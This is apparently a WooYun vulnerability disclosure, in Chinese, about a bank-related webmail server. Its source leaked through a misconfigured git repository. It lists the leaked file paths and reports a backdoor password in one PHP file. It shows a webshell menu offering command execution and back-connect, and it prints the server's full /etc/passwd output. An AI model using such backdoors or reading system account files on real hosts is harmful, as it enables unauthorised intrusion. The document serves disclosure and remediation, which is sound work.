/webmail/main/uploadify/com__/adobe/protocols/dict/util/SocketHelper.as
/webmail/main/uploadify/com__/adobe/serialization/json/JSON.as
/webmail/main/uploadify/com__/adobe/serialization/json/JSONDecoder.as
/webmail/main/uploadify/com__/adobe/serialization/json/JSONParseError.as
/webmail/main/uploadify/com__/adobe/serialization/json/JSONEncoder.as
/webmail/main/uploadify/com__/adobe/serialization/json/JSONTokenType.as
/webmail/main/uploadify/com__/adobe/serialization/json/JSONToken.as
/webmail/main/uploadify/com__/adobe/serialization/json/JSONTokenizer.as
/webmail/main/uploadify/com__/adobe/utils/ArrayUtil.as
/webmail/main/uploadify/com__/adobe/utils/DateUtil.as
/webmail/main/uploadify/com__/adobe/utils/NumberFormatter.as
/webmail/main/uploadify/com__/adobe/utils/DictionaryUtil.as
/webmail/main/uploadify/com__/adobe/utils/IntUtil.as
/webmail/main/uploadify/com__/adobe/utils/StringUtil.as
/webmail/main/uploadify/com__/adobe/utils/XMLUtil.as
/webmail/main/uploadify/com__/adobe/webapis/URLLoaderBase.as
/webmail/main/uploadify/com__/adobe/webapis/ServiceBase.as
/ent.as
/webmail/main/uploadify/deleteFile.php
/webmail/main/uploadify/expressInstall.swf
/webmail/main/uploadify/jquery-1.4.2.min.js
/webmail/main/uploadify/swfobject.js
/webmail/main/uploadify/uploadify.allglyphs.swf
/webmail/main/uploadify/jquery.uploadify.v2.1.4.js
/webmail/main/uploadify/uploadify.css
/webmail/main/uploadify/uploadify.fla
/webmail/main/uploadify/uploadify.swf
/webmail/main/webshow.php
/webmail/main/writeagain.php
/webmail/mobile/_DefineMobileContent.php
/webmail/mobile/_balance.php
/webmail/mobile/_delete_content.php
/webmail/mobile/_mobile_config.inc.php
/webmail/mobile/_insert_content.php
/webmail/mobile/_smsbalance.php
/webmail/mobile/_xmldisplay.php
/webmail/mobile/_updata_content.php
/webmail/mobile/help/images/1.jpg
/webmail/mobile/help/images/2.jpg
/webmail/mobile/help/images/3.jpg
/webmail/mobile/help/images/5.jpg
/webmail/mobile/help/images/4.jpg
/webmail/mobile/help/images/7.jpg
/webmail/mobile/help/images/6.jpg
/webmail/mobile/help/index.php
/webmail/mobile/select_log.php
/webmail/mobile/sms.php
/webmail/mobile/sendsms.php
/webmail/mobile/smsbase.inc.php
/webmail/mobile/xmlbase.inc.php
/webmail/script/add2addr.js
/webmail/redirect.php
/
/webmail/setting/antispam_submit.php
/webmail/script/topdiv.js
/webmail/script/vip.js
/webmail/script/updatePas.js
/webmail/setting/filteroption.php
/webmail/setting/msg_img/btns.png
/webmail/setting/msg_img/icons.png
/webmail/setting/notvip.php
/webmail/setting/passwd.php
/webmail/setting/setlogo.php
/webmail/setting/setpopmail.php
/
/webmail/template/1/index.html
/webmail/template/2/css/script.js
/webmail/template/1/index.html.bak
/
/webmail/template/2/index.html
/
/webmail/template/3/index.html
/
/webmail/template/4/index.html
/
/webmail/template/5/index.html
/
/webmail/template/6/index.html
/webmail/template/6/index1.html
/webmail/template/7/css/script.js
/webmail/template/7/css/style.css
/webmail/template/7/freeMailAdd.html
/
/
/webmail/template/7/index1.html
/webmail/template/7/index.html
/
/webmail/template/8/index.html
/
/webmail/template/9/index.html
/webmail/template/default/css/script.js
/webmail/template/default/css/style.css
/api/util/filter.inc.php
/conf/nowserver.crt.inc.php
/core/emaildecode.class.php
/core/EmailSYS.inc.php
/core/email.class.php
/core/emailuser.class.php
/core/emailencode.class.php
/api/svn_host.php
/core/mysql.class.inc.php
/core/emailutil.inc.php
/core/notice.class.php
/core/page2.inc.php
/core/emailcore.class.inc.php
/core/util.inc.php
/core/send.class.inc.php
/freemail/config/config_inc.php
/m_login.php
/index.php
/mailcontrol/DemailDeleteUnconfirm.php
/mailcontrol/apachelog.sh.php
/mailcontrol/checkDBbackup.php
/mailcontrol/check_mx_server.php
/mailcontrol/dir_move.php
/mailcontrol/dir_fix.php
/mailcontrol/du.php
/mailcontrol/**.**.**.**
/mailcontrol/folderToDB.php
/mailcontrol/hdcheck.php
/mailcontrol/index_upgrade.php
/mailcontrol/mailFailRecord.php
/mailcontrol/mail_**.**.**.**
/mailcontrol/mailbox_move.php
/
/mailcontrol/mailnum_**.**.**.**
/mailcontrol/mailserver_analyseACT.php
/mailcontrol/mailserver_analyse.php
/mailcontrol/mailserver_analyseSEN.php
/mailcontrol/take.php
/mailcontrol/serverstatus.php
/mailcontrol/test/smtp.inc.php
/mailcontrol/webmail/webmail_upgrade.inc.php
/mailcontrol/webmail/webmail_version.inc.php
/mobile/help/index.php
/mobile/manager/attachDownload.php
/mobile/manager/contactEdit.php
/mobile/manager/contactList.php
/mobile/manager/emailList.php
/mobile/manager/contactSubmit.php
/mobile/manager/emailMove.php
/mobile/manager/emailMoveSubmit.php
/mobile/manager/emailRead.php
/mobile/manager/emailSearch.php
/mobile/manager/emailSendSubmit.php
/mobile/manager/emailSearchSubmit.php
/mobile/manager/error.php
/hp
/mobile/manager/login.php
/mobile/manager/setLanguage.php
/mobile/manager/index.php
/mobile/share/bak/top.inc.2008-05-06.php
/routin/H3BackFileDelete.sh.php
/routin/LogManage.php
/routin/routin.inc.php
/**.**.**.**
/system/apachelog.sh.php
/system/dbbak.sh.php
/touch/emailList.php
/touch/emailSendSubmit.php
/touch/help/index.php
/touch/manager/addAttach.php
/touch/manager/attachDownload.php
/touch/manager/contactSelect.php
/touch/manager/contactList.php
/touch/manager/contactSubmit.php
/touch/manager/contactEdit.php
/touch/manager/emailMove.php
/touch/manager/emailMoveSubmit.php
/touch/manager/emailRead.php
/touch/manager/emailSearch.php
/touch/manager/emailList.php
/touch/manager/emailSearchSubmit.php
/touch/manager/emailSend.php
/touch/manager/login.php
/touch/manager/emailSendSubmit.php
/touch/manager/error.php
/touch/manager/new_file.php
/touch/manager/setLanguage.php
/touch/share/bak/top.inc.2008-05-06.php
/version.txt
/webmail/api/htmledit/xml/xmlclient.inc.php
/webmail/api/mail/mailsmsbase.inc.php
/webmail/api/mail/mailbase.inc.php
/webmail/api/sfun/secu.inc.php
/webmail/api/sfun/rsaclass.inc.php
/webmail/api/sfun/sfunRSA.inc.php
/webmail/config/config_inc.php
/webmail/config/dbremote.inc.php
/webmail/css/style2011_gray.css
/webmail/help/helpen_imap_android.html
/webmail/help/helpen_android.html
/webmail/help/mail_client_en.html
/webmail/images/ad/mail_xin.gif
/webmail/images/ad/1980319435.jpg
/webmail/include/api/todaymailbase.php
/webmail/include/fun_inc.php
/webmail/include/list_fun.inc.php
/webmail/include/prev_inc.php
/webmail/include/read_inc.php
/webmail/include/mail_fun.inc.php
/webmail/include/search_inc.php
/webmail/language/utf8_inc.php
/webmail/include/send_fun.php
/webmail/login.php
/webmail/logout.php
/webmail/main/addSpam.php
/webmail/language/utf8_en.inc.php
/webmail/language/utf8_big.inc.php
/webmail/main/advSearch.php
/webmail/language/utf8_gb.inc.php
/webmail/main/controlFolder.inc.php
/webmail/main/doAction.php
/webmail/main/concat.php
/webmail/main/default.php
/webmail/main/hello.php
/webmail/main/killself_send_form.inc.php
/webmail/main/list.php
/webmail/main/mailaddr.inc.php
/webmail/main/mime.php
/webmail/main/mailcurlapi.php
/webmail/main/list_search.php
/webmail/main/other_folders.php
/webmail/main/prev.php
/webmail/main/phpmanager.php
/webmail/main/prev_inc.php
/webmail/main/read_mail.php
/webmail/main/read.php
/webmail/main/send.php
/webmail/main/send_body.inc.php
/webmail/main/sendok.php
/webmail/main/send_form.inc.php
/webmail/main/sendmail.php
/webmail/main/sendstatusapi.php
/webmail/main/setlang.php
/webmail/main/uploadify.php
/webmail/mobile/agentxmlclient.inc.php
/webmail/mobile/sms_class.inc.php
/webmail/script/default.js
/webmail/script/date.js
/webmail/script/mailbox.js
/webmail/script/send.js
/webmail/setting/antispam.php
/
/webmail/setting/autorespond.php
/webmail/setting/filter.php
/webmail/setting/autorespond_submit.php
/webmail/setting/antivirus_submit.php
/webmail/setting/filter_submit.php
/webmail/setting/filteroption_submit.php
/webmail/setting/forward.php
/webmail/setting/forward_submit.php
/webmail/setting/setdefault.php
/webmail/setting/setsign.php
/webmail/setting/whitelist.php
/webmail/setting/uplogo.php
/webmail/tools/addNotice.php
/webmail/tools/add2addr.php
/webmail/tools/cardCmd.php
/webmail/tools/cardDetail.php
/webmail/tools/cardList.php
/webmail/tools/contactsImport.php
/webmail/tools/killself_cmd.php
/webmail/tools/noticeManage.php
/webmail/tools/pubaddr.php
/webmail/tools/readMail.php
/webmail/tools/sms.php
/webmail/vip/autorespond.php
/webmail/vip/filter.php
/webmail/vip/filter_set.php
/webmail/vip/filter_submit.php
/webmail/vip/forward.php
/webmail/vip/forward_submit.php
/webmail/vip/simpleTemplate.inc.php
/webmail/vip/whitelist.php
/webmail/tools/antiv.php
/
/
/webmail/template/default/index.html
/
/webmail/template/defaultnovip/index.html
/webmail/tools/add2card.php
/webmail/test.xml
/webmail/tools/antiv_submit.php
/webmail/tools/contacts_export.php
/webmail/tools/examples.csv
/webmail/tools/fanjianconvert.php
/webmail/tools/forgotPwd.php
/webmail/tools/getpopmail.php
/webmail/tools/forgotPwd_checkAns.php
/webmail/tools/forgotPwd_submit.php
/webmail/tools/killself_list.php
/webmail/tools/popmail.php
/webmail/tools/readNotice.php
/webmail/vip/antispam.php
/webmail/util.php
/webmail/vip/antispam_submit.php
/webmail/vip/antivirus.php
/webmail/vip/antivirus_submit.php
/webmail/vip/autorepondoff.inc.php
/webmail/vip/autorespond_submit.php
/webmail/vip/autorespondon.inc.php
/webmail/vip/filteroption.php
/webmail/vip/filteroption_submit.php
/webmail/vip/hktfilteroption.php
/
/webmail/vip/listsign.php
/webmail/vip/mfilter.txt
/webmail/vip/notvip.php
/webmail/vip/mfilter.php
/webmail/vip/notransmitinfo.inc.php
/webmail/vip/setpopmail.php
/webmail/vip/tmplemessage
/webmail/vip/sign.php
/webmail/vip/nofilteredinfo2.php
/webmail/vip/transmitinfo.inc.php
/webmail/vip/**.**.**.**
/x.php
/xml/upgrade.inc.php
/xml/index.php
/xml/backup.inc.php
/
/webmail/vip/login.php
/webmail/vip/setup.php
/webmail/script/cardDetail.js
**.**.**.** (**.**.**.**)
Charset:
Logout | File Manager | MYSQL Manager | Execute Command | PHP Variable | Port Scan | Security information | Eval PHP Code | Back Connect
Execute Command »
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
sshd:x:100:102:SSH daemon:/var/lib/sshd:/bin/false
ntp:x:74:103:NTP daemon:/var/lib/ntp:/bin/false
messagebus:x:101:104:User for D-Bus:/var/run/dbus:/bin/false
dnsmasq:x:102:65534:dnsmasq:/var/lib/empty:/bin/false
rtkit:x:103:105:RealtimeKit:/proc:/bin/false
avahi:x:104:106:User for Avahi:/var/run/avahi-daemon:/bin/false
pulse:x:105:107:PulseAudio daemon:/var/lib/pulseaudio:/sbin/nologin
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
statd:x:106:65534:NFS statd daemon:/var/lib/nfs:/sbin/nologin
gdm:x:107:109:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
tftp:x:108:110:TFTP account:/srv/tftpboot:/bin/false
squid:x:31:65534:WWW-proxy squid:/var/cache/squid:/bin/false
dhcpd:x:109:65534:DHCP server daemon:/var/lib/dhcp:/bin/false
named:x:44:44:Name server daemon:/var/lib/named:/bin/false
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
polkituser:x:110:112:PolicyKit:/var/run/PolicyKit:/bin/false
ftpsecure:x:111:65534:Secure FTP User:/var/lib/empty:/bin/false
ldap:x:76:70:User for OpenLDAP:/var/lib/ldap:/bin/bash
nagios:x:112:113:User for Nagios:/var/lib/nagios:/bin/false
lxdm:x:113:115:LXDE Display Manager daemon:/var/lib/lxdm:/bin/false
haldaemon:x:114:116:User for haldaemon:/var/run/hald:/bin/false
cyrus:x:96:12:User for cyrus-imapd:/var/lib/imap:/bin/bash
vscan:x:65:117:Vscan account:/var/spool/amavis:/bin/false
quagga:x:115:118:Quagga routing daemon:/var/run/quagga:/usr/bin/false
mysql:x:60:119:MySQL database admin:/var/lib/mysql:/bin/false
fetchmail:x:116:2:mail retrieval daemon:/var/lib/fetchmail:/bin/false
mailman:x:72:67:GNU mailing list manager:/var/lib/mailman:/bin/bash
icecream:x:117:120:Icecream Daemon:/var/cache/icecream:/bin/false
reboot:x:1000:100::/home/reboot:/bin/bash
clamav:x:1001:1000::/home/clamav:/bin/false
todaymail:x:1002:1001::/todaymail:/bin/bash
usbmux:x:118:65534:usbmuxd daemon:/var/lib/usbmuxd:/sbin/nologin
scard:x:119:121:Smart Card Reader:/var/run/pcscd:/bin/nologin
git:x:1003:1002::/home/git:/bin/bash
以上只是一个过程。。零基础py的我朋友又让我帮他写脚本。烦啊。。看遇见扫描结果有的查询语句报错想直接审计代码看能不能找出注入。于是看到
/api/svn_host.php
从下往上看。看啊看啊总感觉后门于是直接翻到最上面password
ok结束了
过程不是很详细,抱歉。
对不起 笔记本真截不了图。
按我说的可以复现
修复方案:
有人留后门一定要清楚啊
越权
上传
git配置不当导致源代码泄露 修复不完善
不能放开发回家要好好修复。。(开玩笑)
不要查水表啊
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2016-01-08 20:12
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT向银行业信息化主管部门通报,并抄报湖南分中心协助处置,由其后续协调网站管理单位处置.
最新状态:
暂无